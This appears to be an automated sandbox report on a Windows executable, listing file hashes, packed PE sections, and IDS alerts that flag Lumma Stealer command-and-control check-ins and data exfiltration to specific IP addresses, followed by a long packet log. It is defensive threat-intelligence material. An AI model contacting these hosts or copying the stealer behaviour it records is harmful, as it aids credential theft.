                                                                                                                                                                                    Entropy (8bit):7.948847739342942
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:file.exe
                                                                                                                                                                                    File size:1'872'896 bytes
                                                                                                                                                                                    MD5:90ca710aaf9dbeb26796e2023b2c20a4
                                                                                                                                                                                    SHA1:8004e727db0632790b42d2789bd0f538a3d8c702
                                                                                                                                                                                    SHA256:485ae38bfcb66923d04a09e0b1310c0d26f93c5b30742827f994ce1c7ec5aa28
                                                                                                                                                                                    SHA512:99148437c69316fc0e0e7c04e2b2db3ab56bd021d8d31904a8225cb7213ceb6f669aaebc48fbe9bd972e8c8ff0fd9f1a62540cb18aec7c37c3290b738d90118a
                                                                                                                                                                                    SSDEEP:49152:VQA1I9yRAK605hJskK7AFCCaExWeNLFJcX0qjdOqv:VBK0AK6fx7FCa+H6jdOq
                                                                                                                                                                                    TLSH:DC85332DFF40296BF44C9B335113FEDB8B73BEA50FA54A20B64C95A99C70949232543E
                                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B3Gg.............................pJ...........@...........................J...........@.................................\`..p..
                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                    Entrypoint:0x8a7000
                                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x67473342 [Wed Nov 27 14:57:06 2024 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                    Instruction
                                                                                                                                                                                    jmp 00007F66C06DE1CAh
                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5605c0x70.idata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x2b0.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x561f80x8.idata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    0x10000x540000x2580083aa3585138efbe12162c57fb3c5a198False0.9977408854166666data7.978612481813435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .rsrc0x550000x2b00x200c13dbba7a6bccbddfbb32472d7ad639bFalse0.796875data6.067715986135596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .idata 0x560000x10000x2005c2aab652c0aafb38fcd0c023cb11951False0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    0x570000x2af0000x2007caf138db9bc8ed0aeac09030db438d8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    kavxkxnu0x3060000x1a00000x1a00006218a4f801412e18601d21a46c9ffafaFalse0.9942556527944711data7.953931606377355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    myhjcrzc0x4a60000x10000x400ab7fbb1c0e486d0ce291cdf909de4c5cFalse0.7802734375data6.123337378127326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .taggant0x4a70000x30000x2200d4c216634dd54b73f9cce1bb450bbc43False0.05813419117647059DOS executable (COM)0.6993973709672261IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                    RT_MANIFEST0x4a5d700x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    kernel32.dlllstrcpy
                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                    2024-11-29T19:49:07.933996+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:08.733730+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:08.733730+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:10.097977+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:11.189119+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649709104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:11.189119+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:12.837784+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:15.265810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:17.729832+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:20.520862+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649720104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:21.645569+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649720104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:23.434839+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649728104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:23.455240+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.649728104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:31.969756+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649749104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:32.776316+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649749104.21.16.9443TCP
                                                                                                                                                                                    2024-11-29T19:49:34.313988+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.649755185.215.113.1680TCP
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Nov 29, 2024 19:48:58.214577913 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.214628935 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.214641094 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.214684010 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:58.214735031 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.214778900 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:58.217021942 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:58.338228941 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379647970 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379688978 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379700899 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379741907 CET49705443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379884958 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379895926 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379905939 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379931927 CET49705443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:48:58.379972935 CET49705443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:48:58.388010979 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.388238907 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.388287067 CET49705443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:48:58.396413088 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.396512985 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.396558046 CET49705443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:48:58.772370100 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.773802042 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:58.773888111 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:58.774007082 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:58.894381046 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.894397020 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:58.894404888 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:59.364914894 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:59.408813000 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:59.598723888 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:59.643198013 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:59.800168037 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:48:59.803052902 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:48:59.925146103 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:00.158823013 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                    Nov 29, 2024 19:49:00.158824921 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                    Nov 29, 2024 19:49:00.356436014 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:00.408737898 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:00.455763102 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                    Nov 29, 2024 19:49:06.594639063 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:06.594672918 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:06.594758987 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:06.620579958 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:06.620599031 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:07.455133915 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:07.455169916 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:07.455231905 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:07.456315994 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:07.456332922 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:07.933912992 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:07.933995962 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:07.937859058 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:07.937870979 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:07.938110113 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:07.986881971 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.033253908 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.033296108 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.033377886 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:08.733711958 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:08.733793974 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:08.733867884 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.779422045 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.779443979 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:08.779458046 CET49707443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.779467106 CET44349707104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:08.881287098 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.881330967 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:08.881405115 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.881759882 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:08.881773949 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:09.734685898 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:09.734828949 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:09.739295959 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:09.739306927 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:09.739695072 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:09.749641895 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:09.749696970 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:09.749701977 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:09.749850035 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:09.768184900 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                    Nov 29, 2024 19:49:09.768250942 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                    Nov 29, 2024 19:49:09.795334101 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:10.065017939 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                    Nov 29, 2024 19:49:10.097863913 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:10.097976923 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:10.099342108 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:10.099348068 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:10.099606991 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:10.100876093 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:10.100898027 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:10.100943089 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:10.303320885 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:10.303405046 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:10.303483963 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:10.303666115 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:10.303687096 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.189104080 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.189171076 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.189202070 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.189233065 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.189249992 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.189310074 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.189318895 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.202459097 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.202547073 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.202557087 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.210818052 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.210879087 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.210892916 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.252527952 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.252540112 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.299410105 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.309746027 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.361896038 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.361916065 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.380804062 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.380878925 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.380897045 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.381159067 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.381206989 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.381215096 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.381259918 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.381320953 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.384222031 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.384237051 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.384273052 CET49709443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.384278059 CET44349709104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.569761992 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.569801092 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:11.569861889 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.570198059 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:11.570214033 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:12.477823973 CET44349702173.222.162.64192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:12.477909088 CET49702443192.168.2.6173.222.162.64
                                                                                                                                                                                    Nov 29, 2024 19:49:12.837636948 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:12.837784052 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:12.843064070 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:12.843075037 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:12.843333006 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:12.845088959 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:12.845257998 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:12.845295906 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:13.896265984 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:13.896390915 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:13.896441936 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:13.896609068 CET49710443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:13.896624088 CET44349710104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:14.005126953 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:14.005171061 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:14.005253077 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:14.005683899 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:14.005700111 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:15.051655054 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:15.051693916 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:15.051784992 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:15.052191973 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:15.052208900 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:15.265665054 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:15.265810013 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:15.267242908 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:15.267251015 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:15.267508984 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:15.269078016 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:15.279784918 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:15.279844999 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:15.279902935 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:15.327338934 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.274203062 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.274327040 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.274408102 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:16.274589062 CET49711443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:16.274606943 CET44349711104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.512512922 CET49713443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:16.512573004 CET44349713104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.512675047 CET49713443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:16.513051987 CET49713443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:16.513058901 CET44349713104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.773392916 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.773690939 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:16.775115967 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:16.775129080 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.775374889 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:16.784754992 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:16.831326962 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.251173973 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.251223087 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.251236916 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.251451015 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:17.251473904 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.251602888 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:17.430484056 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.430505037 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.430648088 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:17.430664062 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.430743933 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:17.474509001 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:17.474525928 CET4434971213.107.246.63192.168.2.6
